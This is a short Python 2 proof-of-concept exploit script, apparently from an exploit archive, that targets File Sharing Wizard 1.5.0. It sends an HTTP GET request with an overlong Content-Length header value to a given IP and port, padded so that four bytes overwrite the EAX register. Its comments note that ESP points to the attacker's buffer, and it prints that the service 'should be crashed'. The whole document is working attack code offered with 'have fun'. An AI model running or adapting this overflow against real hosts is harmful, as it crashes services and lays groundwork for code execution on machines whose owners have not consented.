#!/usr/bin/python # http://www.sharing-file.net/ # File Sharing Wizard Version 1.5.0 build on 26-8-2008 # # controlling EAX # ESP points to our buffer # buffer grows if we increase our string # # more details on http://www.s3cur1ty.de # have fun m1k3 [at] m1k3 [dot] at import socket import sys if len(sys.argv) < 2: print "Usage: vrfy.py " sys.exit(1) ips = sys.argv[1] port = int(sys.argv[2]) string = "A"*51 string += "B"*4 #controlling eax string += "C"*500 header = "Content-Length" print "starting the attack for:", ips print "" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: connect=s.connect((ips, port)) except: print "no connection possible" sys.exit(1) print "\r\nsending payload" print "..." payload = ( 'GET http://%s/ HTTP/1.0\r\n' '%s: %s\r\n' '\r\n') % (ips,header,string) s.send(payload) s.close() print "finished kicking device %s" % (ips) print "... the service should be crashed ... check eax"